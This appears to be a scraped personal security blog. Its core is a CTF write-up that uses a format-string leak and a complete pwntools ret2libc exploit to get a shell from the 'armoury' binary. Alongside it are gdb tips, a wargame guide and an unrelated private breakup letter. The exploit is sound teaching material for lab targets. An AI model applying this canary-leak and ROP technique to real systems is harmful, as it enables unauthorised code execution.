
armoury


0. Some pre-requisites: 


- It's nice to have gdb-peda and pwntools.

- Knowledge on buffer overflow and ret2libc. 

- Knowledge of 64-bit environments and its difference from 32-bit environments (optional)
- "scanf will quite happily read null bytes. it only stops at white space - strcpy/strcat are the functions you should worry about null bytes" -brx


P.S: gdb turns ASLR off by default for every program it runs; to turn it back on inside gdb:

set disable-randomization off


This writeup is based on Naivenom's writeup from the CTF which can be found here.




1. Examining the program


When we boot up the program, we can clearly see the program has a format string bug:


chanbin_lee123@linux:~$ ./armoury

*******Rifle Database**************


Enter the name of Rifle to get info:

%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p


----------------DATA-------------------

0x7fa5447c5683.0x7fa5447c6760.0x7fa544506970.0x7fa5449e7440.(nil).0x1.0x1dbcdbced.0x252e70252e702500.0x2e70252e70252e70.0x70252e70252e7025.0x252e70252e70252e.0x2e70252e70252e70.0xc8316ab63d007025.0x5622dbcdbca0:

Sorry... We dont have any information about %p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p

---------------------------------------


Enter the name of Rifle to get info:

^C


The first few values are leaked pointers (the 3rd, a libc address, is the one we will use later). A little further on, the values are the contents of the stack, and among them our own input: 0x2e70252e70252e70 is the little-endian encoding of the bytes "p.%p.%p.". So the stack contents are leaked starting from the 9th argument (after 9 "%p"s).


Let's check the security on the program.


chanbin_lee123@linux:~$ gdb -q armoury

Reading symbols from armoury...(no debugging symbols found)...done.

gdb-peda$ checksec

CANARY    : ENABLED 

FORTIFY   : disabled

NX        : ENABLED

PIE       : ENABLED

RELRO     : FULL


Canary (Stack Smashing Protector, cookie): a random value, whose lowest byte is null, placed between the local buffers and the saved frame pointer (RBP) and return address (RET). Before the function returns, the program compares it with the original value; if the canary was overwritten by a buffer overflow, __stack_chk_fail is called and the program aborts rather than continuing with a corrupted stack.


NX: Non-executable bit - you will not be able to execute any kind of shellcode by placing it on the stack.


ELF: Executable and Linkable Format


PIE: Position Independent Executable - the executable itself is loaded at a random base address (this includes its .data and .text (code) sections). But since PIE only changes the executable's base address, "objdump -d <ELF executable>" will only give offsets, and these offsets are static: once the base is known, every address is base + offset.


ASLR (without PIE): randomizes the position of the stack, heap and libraries, but the main executable is loaded at the same address each time.

RELRO: full RELRO makes the GOT read-only after relocation, so you won't be able to do anything like a GOT overwrite.
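The bug class examined in section 1, as an added example (this is not the armoury binary's source, which the writeup does not include): a hypothetical lookup reply in its vulnerable form next to the fixed one, plus a small directive counter for untrusted input. The function names are made up; building with gcc -Wformat -Wformat-security flags the vulnerable snprintf call.

```c
#include <stdio.h>
#include <string.h>

/* Fixed form: the format is a constant and the user's text only ever reaches
 * snprintf as the argument for %s, so "%p.%p..." in the name is echoed back
 * verbatim. Returns snprintf's character count. */
int reply_fixed(char *out, size_t out_len, const char *name)
{
    return snprintf(out, out_len,
                    "Sorry... We dont have any information about %s", name);
}

/* The bug class from section 1: the user's text becomes part of the format
 * string itself, so every %p (or %s, %n, ...) in it is interpreted and reads
 * a stack slot. This is the "before" form; it is never called below, and
 * gcc -Wformat-security warns on the second snprintf. */
int reply_vulnerable(char *out, size_t out_len, const char *name)
{
    char fmt[256];
    snprintf(fmt, sizeof fmt,
             "Sorry... We dont have any information about %s", name);
    return snprintf(out, out_len, fmt);   /* BUG: attacker-controlled format */
}

/* Count conversion directives in untrusted text, i.e. how many arguments a
 * vulnerable printf would consume. "%%" is the escape for a literal '%' and
 * reads nothing; "%3$p" is a positional reference and still counts as one.
 * Usable as a logging heuristic for this input field; the fix is reply_fixed. */
int count_conversions(const char *s)
{
    int n = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {   /* "%%": skip the pair */
            p++;
            continue;
        }
        n++;
    }
    return n;
}

/* Test oracle for the fixed form: the reply must end with the user's text
 * exactly as it was sent, no matter which directives it contains. */
int reply_echoes_input(const char *name)
{
    char out[256];
    int n = reply_fixed(out, sizeof out, name);
    size_t len = strlen(name);
    if (n < 0 || (size_t)n >= sizeof out || (size_t)n < len)
        return 0;
    return strcmp(out + n - len, name) == 0;
}

int main(void)
{
    /* Constructed input: the probe the writeup sends to the CTF binary. */
    const char *probe = "%3$p.%13$p.%14$p";
    char out[256];
    reply_fixed(out, sizeof out, probe);
    printf("%s\n", out);                        /* probe echoed verbatim */
    printf("directives in input: %d\n", count_conversions(probe));
    printf("echoed verbatim: %s\n", reply_echoes_input(probe) ? "yes" : "no");
    return 0;
}
```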




2. Gathering materials


What we need:
- Leaked canary

- Gadget (pop rdi; ret)

- Three libc addresses:

- base of libc

- (offset to) system()

- (offset to) "/bin/sh"


2.1. Getting the Canary


So, we already know from the first format string bug, that we are able to access information on the stack.

I first put a breakpoint in main (using the b *main command) and ran the program, giving "BBBB" as the input. 

At the breakpoint, we can investigate the value of $rsp to see what we have.



As you may observe, we have BBBB (0x42424242) on the stack. We can also see the canary (its lowest byte is null), the saved RBP, and the return address.


The canary is located right before the stack frame pointer. As we know that the stack is leaked after 9 %ps, we can conclude that the canary is the 13th argument, the sfp is 14th, and the return address is the 15th argument we can receive from our format string.


2.2. Getting the ELF base address



When we observe the saved RBP, we can see that if we clear its low 12 bits (the last three hex digits, i.e. & ~0xfff), we get the ELF base address.

This will be useful to us when we add our gadget's offset to the base address.


2.3. Getting the LIBC base address

Breakpoint at giveInfo to set a stop, so that we can observe the registers and addresses. (b giveInfo)

Run the program. (r)



There we can see the address printed for the input "%3$p" (the third value of the leak).



If we take a look at that third leaked value, we can use it to compute the libc base, as the gdb session below shows. We need to grab a few more values too.


gdb-peda$ p 0x7ffff7b15970-0x00007ffff7a3a000 

$1 = 0xdb970


gdb-peda$ p system

$2 = {<text variable, no debug info>} 0x7ffff7a79480 <__libc_system>


gdb-peda$ p 0x7ffff7a79480 -0x00007ffff7a3a000 

$3 = 0x3f480


We see that:

%3$p: Address of <__write_nocancel+7>

Offset to libc: 0xdb970

Offset from libc to system: 0x3f480


--> %3$p - offset to libc + offset from libc to system = address of system (in libc)


2.4. Address of "/bin/sh"


gdb-peda$  find "/bin/sh"

Searching for '/bin/sh' in: None ranges

Found 1 results, display max 1 items:

libc : 0x7ffff7b9bc19 --> 0x68732f6e69622f ('/bin/sh')


gdb-peda$ p 0x7ffff7b9bc19 -0x00007ffff7a3a000 

$4 = 0x161c19


2.5. ROP Gadgets (pop rdi; ret)


chanbin_lee123@instance-2:~$ ROPgadget --binary armoury

Gadgets information

============================================================

0x0000000000000d03 : pop rdi ; ret




3. POC


BUFFER [24]

CANARY [8]

DUMMY [8]

POP RDI; RET [8]

ADDRESS OF "/BIN/SH" [8]

ADDRESS OF SYSTEM() [8]


(Basic ret2libc structure)




4. Exploit Rundown


Full exploit can be found in the next section.

I'll try my best to explain everything. T_T Please ask if you don't understand something.


payload = ""

r.recvuntil("Enter the name of Rifle to get info:\n")
r.send("%3$p.%13$p.%14$p\n")  # libc address, canary, saved rbp

We want the 3rd, 13th and 14th arguments so we leak those.


leak = r.recvuntil(":").replace(":", "").split(".")
leaked_libc = int(leak[0], 16)

offset_to_libc = 0xdb970
offset_to_system = 0x3f480
offset_to_binsh = 0x161c19

Once we receive the leaks, we split the string on '.'.

leak[0] = 3rd argument (libc address), leak[1] = canary, leak[2] = saved RBP

I also save the offsets found in section 2.


libc_addr = leaked_libc - offset_to_libc
system_addr = libc_addr + offset_to_system
binsh_addr = libc_addr + offset_to_binsh

Calculate all the addresses I need using the offsets. If any of these calculations don't make sense, refer back to section 2.3 - I've explained a little bit there.

canary = int(leak[1], 16)
leaked_elf = int(leak[2], 16)
elf_addr = leaked_elf - (leaked_elf & 0xfff)

offset_pop_rdi = 0xd03
pop_rdi = elf_addr + offset_pop_rdi

I also convert the canary to an int here and calculate the ELF base address.

leaked_elf & 0xfff gives the low 12 bits (the last three hex digits) of the leaked address; subtracting them from the leaked address leaves the page-aligned base address.


payload += "A"*24       # Fill up the buffer
payload += p64(canary)  # Canary
payload += "B"*8        # Overwrite saved RBP
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(system_addr)
payload += "\n"

As written above (POC), this is the generic ret2libc payload. Since the first argument to system() is passed in RDI, we load the address of "/bin/sh" into RDI (using pop rdi; ret) and then return into system().




5. Full Exploit


from pwn import *

r = process("./armoury")

payload = ""

r.recvuntil("Enter the name of Rifle to get info:\n")
r.send("%3$p.%13$p.%14$p\n")  # libc address, canary, saved rbp

r.recvuntil("----------------DATA-------------------\n")

leak = r.recvuntil(":").replace(":", "").split(".")
leaked_libc = int(leak[0], 16)

offset_to_libc = 0xdb970
offset_to_system = 0x3f480
offset_to_binsh = 0x161c19

libc_addr = leaked_libc - offset_to_libc
system_addr = libc_addr + offset_to_system
binsh_addr = libc_addr + offset_to_binsh

print "libc address: " + hex(libc_addr)
print "system address: " + hex(system_addr)
print "binsh address: " + hex(binsh_addr)

canary = int(leak[1], 16)
leaked_elf = int(leak[2], 16)
elf_addr = leaked_elf - (leaked_elf & 0xfff)  # clear the low 12 bits

print "canary: " + hex(canary)
print "elf address: " + hex(elf_addr)

offset_pop_rdi = 0xd03
pop_rdi = elf_addr + offset_pop_rdi

payload += "A"*24       # Fill up the buffer
payload += p64(canary)  # Canary
payload += "B"*8        # Overwrite saved RBP
payload += p64(pop_rdi)
payload += p64(binsh_addr)
payload += p64(system_addr)
payload += "\n"

r.recvuntil("Enter the name of Rifle to get info:\n")
r.send("AAAA\n")

r.recvuntil("Would you like to give us some feedback:\n")
r.send(payload)

r.interactive()



Hey.


It's been a long year and a half. Two years, I should say.


You know, it's been only a day and I've been suffering so much. It's definitely less suffering than this whole week's worth of my suffering, so it's okay, but it's not okay. If I'm the one who dumped you, why am I so sad? Funny. 

I've been thinking and I still had a lot to say on my mind that I couldn't tell you yesterday. 


This is a closure letter for you and for myself.


Wow, I've actually ended the relationship. I can't believe it.

I guess now I've come to realize it was actually a huge part of my life.

If anything, I wish that you wouldn't think that I ended the relationship because I loved you any less than I used to.

(Which is sad. I know. But I'm a reasonable person. For your career, for my mental health, this had to end and I think we can both agree on that.) 


It's not your fault. You should realize that. Yes, it is your fault you can only prioritize your career above me. 

But that's the right thing for you, and that's not something to feel guilty for. We just weren't meant to be.

We're barely 20. The fact that you have your life prioritized is something you should be proud of. 

You're a special person to me that will never be able to get replaced by anyone else. I don't know if it's our time spent together, or everything we've shared with one another.


I was scared that I would drag on the relationship with false hopes and tire everyone out. I didn't want to hurt anyone, you or me, so I had to go ahead.

It might have been a bad choice. I regret maybe a little bit...but I really think it was the best choice for us long term.

There are many chances in life. Life moves on. 


I miss the old times when we were really close friends. So I went ahead and read our past messages because clearly I can't get over anything.

It surprised me how much we've changed. Our core and humor might not have changed, but the way we talk, the way we communicate.. It's all different now.

It made me a bit sad that maybe that we might not be able to go back to our previous selves. 


But we've grown as people. We're different people now.

We were both high school students, and we're both at university now pursuing something different than what we had originally planned for. 

Our lives will change so much over the next few years. Crazy, huh?


I don't know what I should do with the things that remind me of you. 

What about the things that never made it to you? How do I get rid of them? 

The 30 cards I wrote that never made their way to you? The presents? 


How do I survive this week without you? 


I've decided to call it a 'pause' - I'll let everything be, until I rack up the courage to put them away somewhere, to do something with them. 

As of now, I have no idea what to do with them and I have no motivation.. I feel alone in this world. But I'll eventually get better.


How was your first day of lectures? Labs? 

I wanted to be a part of your university life and growth, someone you could get support from. 

But that can't happen anymore and you didn't need my support anymore. 


Now that that's done with, I feel like our relationship could have gone better. I could have taken things more lightly. It could have been a break instead of a break-up. Less commitment. We could still have been 'together'. But that's not respectful to both you and me and everything we've been through together. There would be this awkward dying relationship lingering on, hindering both of us. At that point, is it even a relationship anymore? I know because I spent the whole last week thinking about it. It's better to move on when we both still like each other rather than wait for guilt and resentment to build up.


You know what I realized? We were on different pages. I didn't need you to provide anything, I wasn't missing out on anything, if that's what you worried about. I just needed communication and that's all. I don't know whether you thought you were limiting me in terms of options and chances, but that doesn't really matter when I'm not actively looking for a relationship. I was good with having only you by my side but you never understood and never gave me the communication I needed.


Any thought of this "could've gone better" is an illusion of a breakup. I wasn't happy with the relationship, you weren't. I just don't remember that bad feeling anymore because of your empty space. I really don't remember anything bad, maybe I could have endured it -- but I know you weren't emotionally available to take all my burden either. Expecting that from you would be rude of me, and quite frankly speaking, I'd like to think you were tired of my shit by the end of it too.


I vaguely remember, I didn't feel loved by the end. I felt neglected and ignored most of the time. Our communication ceased, your "I love you"s ceased. You stopped reading my messages. Did you notice that? Even if you read my messages, you never finished reading them, unlike before. I could have dealt with it but I think I've had my fair share of communication issues. It was like talking to a wall. I would like to think it was the stress getting to you transitioning into university, business, whatever, and I'm sorry for leaving you behind during the pressurizing times. But I wasn't willing to continue a relationship with someone I didn't feel loved with. Something didn't feel right. We weren't communicating enough, and I can't survive with someone knowing that I am not the priority in their lives. I didn't feel like I was getting what I needed, you were right. 


I tried my best, I know you did too. Thank you for that. Thank you for trying in the first place. We knew that this might not work out since the very beginning, but we decided to try it out. And that's all that matters. Because it was worth it.

It was the first time in my life where I felt appreciated for who I really was.

Me being able to become a more cheerful and outgoing person at university is partially thanks to you. 

I learned how to become vulnerable at times. More open-minded. And how to stay comfortable with myself being emotionally vulnerable.  


And I know you're going to be successful. Because you will be.

I hope you've learned more things about yourself too. I'm sorry I had to hurt you at the end. 


I know for myself that we both have to move on. I'll take some time to myself to build myself back up. 

I'll be able to move on. Meet someone better suited. Take care of myself, now that I've learned.


You know, since the very beginning, it's like you predicted this to happen. 

You started the relationship by saying "We can and should have these romantic chats and whatever couples do, but at the end of the day, I would prefer us to be more like BFFs." We just didn't think it through and kinda became a solid couple which kinda ended badly, but that doesn't change the fact that you called it since the beginning; I feel like you should be a fortuneteller.

You're always right btw. Not saying that as a joke but things you say eventually happen. :-)


We might have been the best for each other, we won't know. 

I truly believe that we had a relationship that no one else could understand (cheesy but the truth).

I don't have to regret anything we did, and this relationship as a whole, because all the memories I had with you were surely the happiest moments of my life. If we're meant to be, fate will put us back on the same path.


I have to heal. I have to make decisions for myself. We both didn't fit in terms of expectations and what we could do. 

One day, I might just be a more stable person with more confidence in my own career and life, more control over everything, and the same type of relationship might be possible just because we've grown up.


But I don't think that's what I want as of now. I'm too young, too immature, too fragile. 

You'll be able to meet someone if you treat them with everything you've treated me with, and I believe in my words. You should believe in yourself too.

Someone more understanding of your schedule. Someone who loves you as much as I did. Someone who is okay about not being a priority.


And that's what I hope you'll do. Even if you don't want to, I want you to move on. 

Because I realized that the person I used to love isn't available anymore. I barely recognize you now, all busy, prioritizing many different things over our relationship. We've all moved on in our own ways and that's not a bad thing. Maybe if I loved you enough I would be happy with you making new connections, learning new things, not being available and I wonder if it's a fault on my end too.


Even if we, per any chance, get back together in the future, it will not be the you and me we started off with in 2017. 

It will be the you and me in the future as two different people. Because unfortunately me and you of 2017 to 2019 didn't work out big time.


I want myself to move on. I'm doing well. 

Next time you see me, I'll introduce myself again as a new person because I will be a different person by then.

And I hope you will too. 


So goodbye, my ex and bestie.

Thank you for everything. 


Farewell! Till next time. :)





Print your payload:

print payload


Pipe it into a file:

EverTokki@pico-2018-shell:~/rop$ python test.py > input


Breakpoint where your program returns:

EverTokki@pico-2018-shell:~/rop$ gdb -q gets

Reading symbols from gets...(no debugging symbols found)...done.

gdb-peda$ b *0x080488a2

Breakpoint 1 at 0x80488a2


Run it with your payload:

gdb-peda$ r < input

Starting program: /home/EverTokki/rop/gets < input

GIVE ME YOUR NAME!


Display your current pc (instruction): 

Breakpoint 1, 0x080488a2 in vuln ()

gdb-peda$ disp/3i $pc 

1: x/3i $pc

=> 0x80488a2 <vuln+38>: ret    

   0x80488a3 <main>: lea    ecx,[esp+0x4]

   0x80488a7 <main+4>: and    esp,0xfffffff0


Step into instructions:
gdb-peda$ si


Keep watching your registers and note when it screws up.



Learning something is pretty difficult in security. It has a steep learning curve for sure. There are a lot of resources online - but just not enough. (Even more so if you compare it to the amount of computer science resources there are; I feel like we just lack variety.) After some point, the attacks get sophisticated, but you can't really learn from anything; you'll have to research vulnerabilities by yourself. My friend also expressed a concern about how he felt so standalone in the field whenever he tried to learn something new.

Of course, we could attend conferences, but it would be better if documentation was just available online.


That's why you need to write documentation. Whether that be a short, easy way to do things, or a really complicated method, writing it down will help someone else. Writing it down will help yourself. You'll get to remember more, understand more, and share your knowledge along the way.


I hope to write some docs over the next few months too.

Share your knowledge. Sharing is caring.



Double_Staged_Format_String_Attack__pwn3r.pdf

Olly Debugger 사용 방법 강좌 2부.hwp

bof_fsb.hwp

remote_overflow2.pdf

remote_overflow1.pdf

code_exec.pdf

Olly Debugger 사용 방법 강좌 1부.hwp

asm_beginner.pdf

buf_overflow_techniques.pdf

fsb_howto.pdf

craft_shellcode.pdf

exploit_using_unfinished_str.pdf

fileread_race.pdf

datastructures.pdf

fsb원리.pdf

semaphores.pdf

fsb.pdf

ret-t-lib.pdf

BOF_strace.hwp


Some of these documents may be a bit past their expiry date (?), but I needed documents to read,

and while Hackerschool's Flash interface might have been cool in 2005, in 2019 it is at a level that beggars belief,

so I quietly picked out only the ones that looked interesting and posted them here.


https://www.hackerschool.org/HardwareHacking/

This also looks fun, but I'm going to try hardware only after I'm comfortable with software first.

Hmm.. I'm hungry.


http://phishinginfo.weebly.com/
A trip down memory lane.

Don't get baited, save your privacy.


Here's a ppt I made 6 years ago:


phishingmethods.pptx



It's finally time. I've always thought about translating this post but I finally get to do it now.


[What is Lord of the BOF?]

From a relatively easy environment, Redhat 6.2 to the ultimate Fedora 14 -

You'll have to go through numerous levels and show off your BOF skills.


Solve the highest level and shoot me an email at chanbin.lee123@gmail.com with a writeup of the death_knight challenge - I'll send you the Fedora image file.


[How to]

Lord of the BOF is given as a vmware image so that you'll have your own environment to connect into and play.


[Download]

1. Download the following vmware image and boot up!

http://hackerschool.org/TheLordofBOF/TheLordOfTheBOF_redhat_bootable.zip

2. Login with credentials: gate/gate

3. Set up your network settings through netconfig (There's a setuid set on the system)

4. Check your ip. (/sbin/ifconfig)

5. Use something like PuTTY or Xshell to connect (telnet) to the image and start hacking.


[Basic Rules]

1. No single boot

2. No root exploit

3. NOT allowed to use LD_PRELOAD on the /bin/my-pass command


[How to check your next level's password]

/bin/my-pass


[List of Levels]


LEVEL1 (gate -> gremlin) :  simple bof

LEVEL2 (gremlin -> cobolt) : small buffer

LEVEL3 (cobolt -> goblin) : small buffer + stdin

LEVEL4 (goblin -> orc) : egghunter

LEVEL5 (orc -> wolfman) : egghunter + bufferhunter

LEVEL6 (wolfman -> darkelf) : check length of argv[1] + egghunter + bufferhunter

LEVEL7 (darkelf -> orge) : check argv[0]

LEVEL8 (orge -> troll) : check argc

LEVEL9 (troll -> vampire) : check 0xbfff

LEVEL10 (vampire -> skeleton) : argv hunter

LEVEL11 (skeleton -> golem) : stack destroyer

LEVEL12 (golem -> darkknight) : sfp 

LEVEL13 (darkknight -> bugbear) : RTL1

LEVEL14 (bugbear -> giant) : RTL2, only execve

LEVEL15 (giant -> assassin) : no stack, no RTL

LEVEL16 (assassin -> zombie_assassin) : fake ebp

LEVEL17 (zombie_assassin -> succubus) : function calls

LEVEL18 (succubus -> nightmare) : plt

LEVEL19 (nightmare -> xavis) : fgets + destroyers

LEVEL20 (xavis -> death_knight) : remote BOF 




Name | Chanbin Lee (EverTokki)

Major | Computer Science

Hobbies | Drawing, CTF, osu!



(I really like bulbasaurs)


I like making stuff, breaking stuff..

But I write posts about breaking stuff more than making stuff.


I've competed with:

2013.09 - 2015.01: 🇰🇷 Team LeaveRet

2019.02: 🇨🇦 Team Maple Bacon
